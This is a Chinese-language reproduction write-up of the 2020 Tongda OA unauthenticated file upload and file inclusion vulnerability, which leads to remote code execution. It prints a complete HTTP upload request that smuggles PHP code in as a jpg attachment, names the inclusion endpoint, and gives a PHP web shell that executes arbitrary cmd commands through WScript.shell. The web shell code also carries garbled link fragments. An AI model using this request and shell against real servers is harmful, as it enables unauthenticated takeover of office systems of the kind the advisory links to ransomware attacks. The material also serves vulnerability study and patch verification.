3.13通达OA任意文件上传+包含复现分析

##3.13通达OA任意文件上传+包含复现分析
##简述
通达OA是北京通达信科科技有限公司出品的 “Office Anywhere 通达网络智能办公系统”。
3月13日，通达OA在官方论坛发布通告称，近日接到用户反馈遭到勒索病毒攻击，提示用户注意安全风险，并且于同一天对所有版本发布了加固补丁。
在受影响的版本中，攻击者可以在未认证的情况下向服务器上传jpg图片文件，然后包含该文件，造成远程代码执行。该漏洞无需登录即可触发。
影响版本
###文件上传漏洞为全版本通杀
v11.3 2017 2016 2015 2013 增强版 2013

####文件包含漏洞只有2017和V11.3版本存在
#####手工复现#
V11.3#
#######上传
/ispirit/im/upload.php
POST /ispirit/im/upload.php HTTP/1.1
Host: 192.168.248.131
Content-Length: 658
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypyfBh1YB4pV8McGB
Accept: /
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,zh-HK;q=0.8,ja;q=0.7,en;q=0.6,zh-TW;q=0.5
Cookie: PHPSESSID=123
Connection: close

------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name=“UPLOAD_MODE”

2
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name=“P”

123
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name=“DEST_UID”

1
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name=“ATTACHMENT”; filename=“jpg”
Content-Type: image/jpeg

<?php
echo 123;
?>
------WebKitFormBoundarypyfBh1YB4pV8McGB–

 

包含#
/ispirit/interface/gateway.php
 

证明 上传可用  包含用
上传一句话木马
<?php
$command=$_POST[‘cmd’];
$wsh = new COM('WScript.shell');]() [$exec = $wsh->exec("cmd /c ".$command);
$stdout = $exec->StdOut();]() [$stroutput = $stdout->ReadAll();
echo $stroutput;
?>
 
 

执行shell
 

####参考说明
https://github.com/jas502n/OA-tongda-RCE
https://mp.weixin.qq.com/s?__biz=MzU2NTY1NTQxNw==&mid=2247485643&idx=1&sn=fbf88da313852b50be15b08a7a5d602f&chksm=fcb92addcbcea3cbf71f4151cb19df4509dc6dea1ef86bed8ceef3b99210745994b815646d69&mpshare=1&scene=23&srcid=&sharer_sharetime=1585054739883&sharer_shareid=573e169d70351017c968db63a63c0ed9#rd
https://mp.weixin.qq.com/s?__biz=MzU0ODg2MDA0NQ==&mid=2247483721&idx=1&sn=46545810034290c69fd273443398cf8c&chksm=fbb9f8abccce71bdd038dd93a5701f7d275a242e304e66636c53670ca6bcdb2126b099e2971f&mpshare=1&scene=23&srcid=&sharer_sharetime=1584599692956&sharer_shareid=573e169d70351017c968db63a63c0ed9#rd
https://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&mid=2650460286&idx=2&sn=33bab282bdc585b969d78d1e5aeef946&chksm=83bbb59ab4cc3c8c7ad16de72e24f65192e84e7217a1860b6b7d9dc7e6c2ac3cfc827c35e112&mpshare=1&scene=23&srcid=&sharer_sharetime=1584764219575&sharer_shareid=573e169d70351017c968db63a63c0ed9#rd
https://mp.weixin.qq.com/s?__biz=MzI0NzEwOTM0MA==&mid=2652474779&idx=1&sn=39abda9c01a8cfda4c7075be21ce032d&chksm=f2582e28c52fa73ef3f40a635849d12df2268ff181f0e28f6f9dd94da9f9692645ee6b2d14af&mpshare=1&scene=23&srcid=&sharer_sharetime=1584764427295&sharer_shareid=573e169d70351017c968db63a63c0ed9#rd
https://mp.weixin.qq.com/s?__biz=MzU1NDkwMzAyMg==&mid=2247484095&idx=1&sn=ba1519a0a98b662962d7e5e29e365f6d&chksm=fbdd363eccaabf28d4301e785f5827e459f8985b5e35d090795333d6a9703a38dae23b060183&mpshare=1&scene=23&srcid=&sharer_sharetime=1584765842974&sharer_shareid=573e169d70351017c968db63a63c0ed9#rd